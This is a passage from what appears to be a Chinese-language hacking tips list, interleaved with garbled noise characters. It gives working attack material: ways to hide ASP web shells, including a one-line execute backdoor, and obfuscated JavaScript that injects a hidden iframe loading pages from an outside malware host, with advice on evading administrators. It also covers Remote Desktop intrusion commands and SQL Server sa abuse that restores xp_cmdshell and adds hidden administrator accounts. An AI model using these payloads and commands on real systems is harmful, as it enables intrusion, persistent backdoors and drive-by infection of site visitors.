* V( C( u/ P1 H4 R用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。! D+ R e/ Z2 ?8 X4 e
6 x9 Y& [2 K% B4 G
53、隐藏ASP后门的两种方法
" S ^6 J& F- ^% V; L* U1 R4 Q3 i1、建立非标准目录:mkdir images..\
+ a7 A% m) M6 ~" K- T2 m拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
& h6 f% J" o, `6 _5 F; y通过web访问ASP木马:http://ip/images../news.asp?action=login
- T9 C! k* K0 h0 ~如何删除非标准目录:rmdir images..\ /s
: v" V# u/ M6 K$ L1 V2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
. F6 B- O C# p) D& B; N1 l2 J) Kmkdir programme.asp
6 H) b& _" H9 z1 n. Q- R新建1.txt文件内容:<!--#include file=”12.jpg”-->
" E0 r: U( l: W% {+ |. Z D新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
% }" Z: T2 Y$ H# aattrib +H +S programme.asp
; W" e3 n' D6 X8 v. G( V2 ], ~3 c通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
* q' @+ @. f( y7 h& K# y6 w2 o
5 \, O1 u9 v9 k/ e( W! H54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
* R; h2 A. v) r2 t1 t+ W c" M然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
" R. O- K" |5 C2 G% e# S/ J
2 N4 c+ R' U5 N+ [, h9 S- l55、JS隐蔽挂马/ R) r( |# A- S5 N
1.
, D2 h# G) b6 y/ Rvar tr4c3="<iframe src=ht";+ o2 U* M, Z. d9 b
tr4c3 = tr4c3+"tp:/";
! q; V+ [ o8 r% L; S, Z+ Xtr4c3 = tr4c3+"/ww";9 N$ ^& f; ?/ Z/ t+ V% W* _
tr4c3 = tr4c3+"w.tr4";
* x% V$ O/ }3 ]9 H* E7 C9 ltr4c3 = tr4c3+"c3.com/inc/m";& q+ t7 r# J7 [
tr4c3 = tr4c3+"m.htm style="display:none"></i";* G9 x% m1 _3 v @/ ~; t
tr4c3 =tr4c3+"frame>'";
; Z' ~4 K% _. t! p! p! I- Y8 v6 \: odocument.write(tr4c3);9 Q' \9 S1 P. { n3 P
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。! ?) \) Q4 K# g5 v3 S
& z8 Z& o9 A; Q0 T- R4 X- A
2.
4 G7 w$ x- f5 f5 c# v转换进制,然后用EVAL执行。如
, P0 I5 ~* I6 w1 ~1 v! |4 T, Meval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");: s( [$ ?0 r$ C* _- Q
不过这个有点显眼。
! Y# {4 j6 V, e/ o$ F* |* ^( T' W3.
8 z0 v# c# p {document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');# t/ [% c8 v2 ~$ ]/ M, y
最后一点,别忘了把文件的时间也修改下。
~3 O7 v) O$ a* T! D
9 `; P( c! x" s: F56.3389终端入侵常用DOS命令/ [9 Z8 \! t# n6 d
taskkill taskkill /PID 1248 /t2 i$ U3 }* z! {) ]2 V* w& t& K
( T) E4 t7 M& T, U* u* T
tasklist 查进程5 u: {" T# n6 r9 r
" e8 S- R0 b: b+ Y6 z
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限- b; V& ?) h7 [0 V, R7 S
iisreset /reboot% v3 b* M" J. w8 a$ J3 H
tsshutdn /reboot /delay:1 重起服务器
! x# i% k# L$ s) K8 _$ z
* |0 i$ J- W/ l Qlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
! x Z" n* m6 p+ ^1 I% w& {4 m+ o' r4 _* z; V3 e- x) d# O( h$ ]
query user 查看当前终端用户在线情况
5 l1 Y* Q* U/ x4 ]2 m/ y* l( w. H6 U: e2 m4 x
要显示有关所有会话使用的进程的信息,请键入:query process *
9 `' W) U1 T9 C0 h- l/ c: r! H- [; n4 }9 K8 ~# e. A
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:26 z _; r* f6 p* k* Y: Y
& E* c j+ b' y/ g, [2 O* [
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
$ Q0 U2 O4 u- m' d$ w# z f7 b/ l" ?* b6 |
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
2 E" @1 i( \1 Y+ L2 q$ v. o3 a) I, D, Y) m3 |- N
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启* _: ]0 [" f, T C s$ C. U) ]
}5 b8 ~, v- q/ W. `3 \
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统0 W3 h; N9 T( b6 |4 N- J1 w
' c2 B( \5 ~( y9 T7 x/ \7 v
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。; q0 W$ p, Q7 u/ x* { H P
4 G0 r! R( q4 p: T
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机6 X; O! v0 o, P+ c( N4 L' S
4 y! l# {) k0 }- Y' \
56、在地址栏或按Ctrl+O,输入:, h5 E: F2 g6 A% _& b" J4 E& M3 S- P
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
5 r" W+ @8 z2 c$ J! q% o S5 I
- @! {: @/ M' f4 s源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。! a" {; G: B: Q* d1 Z p
+ m5 K9 ?- F' R' N, p' z9 o; Y
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
) O1 c5 U5 Q& v用net localgroup administrators是可以看到管理组下,加了$的用户的。
0 Q6 Y% q, D8 V9 W
* r2 E: ]9 B3 ?/ E- \" W58、 sa弱口令相关命令) X# n- q1 w* t- D3 E$ ^/ d- `
1 r5 k6 H Z- D一.更改sa口令方法:
, z' U8 _* b! f) E) a用sql综合利用工具连接后,执行命令:' b) w* [! u3 m" l. W% I4 J; ^
exec sp_password NULL,'20001001','sa'
2 H) w. V. O+ |8 T+ Z) f& j# O(提示:慎用!)5 \ b7 \# p9 i& y2 C7 }+ T6 M
" n* k, v9 [3 k& g9 b2 n! J) I二.简单修补sa弱口令.! `$ ^. ?( T; U* {) m% o/ ^
* p' q$ P# E0 h7 P+ ?: P4 a8 M( y方法1:查询分离器连接后执行:5 N& c. G# B; Q5 A
if exists (select * from
) k8 C% C' G3 @0 P/ a# adbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
* y7 c% N2 z3 y, f9 t6 T" ZOBJECTPROPERTY(id, N'IsExtendedProc') = 1)7 V5 g9 [1 v3 `. \
* X O' }6 y0 E* J4 |exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'# n2 \6 p! j2 w! Y8 Y
7 ]! w, X' G1 R6 }6 O' r- T
GO+ S) l7 }$ k5 a7 S
, z4 e( F" I6 E; I然后按F5键命令执行完毕
4 L2 F% V$ Q4 R! E$ k4 r
' C+ w5 n9 Y; m& v方法2:查询分离器连接后
5 ]) C) I; w7 N" X第一步执行:use master9 d% p# g7 H' k! O5 @
第二步执行:sp_dropextendedproc 'xp_cmdshell') X: F% S. }( D& d& {8 Z
然后按F5键命令执行完毕/ G6 O3 @. W& E5 I0 Z
% d' H- K5 l3 i8 R( a* I" o8 {3 z& ]% l' @
三.常见情况恢复执行xp_cmdshell.! h" w& M3 A- Q* i: w7 r
" K+ P5 y ^* b9 {! i, }2 z( U4 w! g) }$ C+ Q' [* i
1 未能找到存储过程'master..xpcmdshell'.
# s' h# n3 v$ W' S) Q9 T2 B% ]) F7 X' X* o 恢复方法:查询分离器连接后,
6 L; H1 Q; }8 o9 N第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int+ {9 l+ K1 ^. ] ]: E: P
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
1 j5 ?% ~3 H, n然后按F5键命令执行完毕$ r3 [' U! U8 @' k! H) a
5 j1 d M3 `1 J: Q/ f
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)" Z, o9 W1 x# z8 N+ u0 z% X
恢复方法:查询分离器连接后,
, i4 C& p$ d) K( ]8 i第一步执行:sp_dropextendedproc "xp_cmdshell"5 W5 i& `) M8 f7 K$ S# O6 @1 Z
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
1 t0 o' i7 Y9 q9 R) ?然后按F5键命令执行完毕" g; k$ W0 j# f/ n4 U' G
1 z3 N6 Z0 _$ `3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)! |* B& x) U# g" y7 k- g$ m) z
恢复方法:查询分离器连接后,
9 P; h7 [8 j" L8 L第一步执行:exec sp_dropextendedproc 'xp_cmdshell'' U7 t3 f6 _ Q, B4 n" M$ L0 I
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
( Y+ o3 U3 W8 ~6 W: Y然后按F5键命令执行完毕
. o+ x7 a. y" b" Q$ n# S6 n+ M/ e) r- V3 @% }' ?
四.终极方法./ w8 m1 m* W( n! z0 W( v1 f
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:# U9 _5 O& s& w; y( h T
查询分离器连接后,
& W" P: r3 j% C" K4 ~+ g* q2000servser系统:9 O! F2 {& _+ ~& k3 H
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
# E( f5 Q7 l% x
) ^2 P4 s6 J' m, |declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
3 o6 W. q2 {! O, F) n( T% Y9 |
2 N- q7 e8 ?! Y! Sxp或2003server系统:
7 J! i$ s) I: ? `. U9 g! D, z5 K, A- T5 W: Z8 c0 S' k2 h
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
: G+ P& V! Z* C% f9 k' U) l: J! r7 o
0 q' I+ t6 D* A/ m! rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'& j* c1 R7 X. O) R+ u1 X
|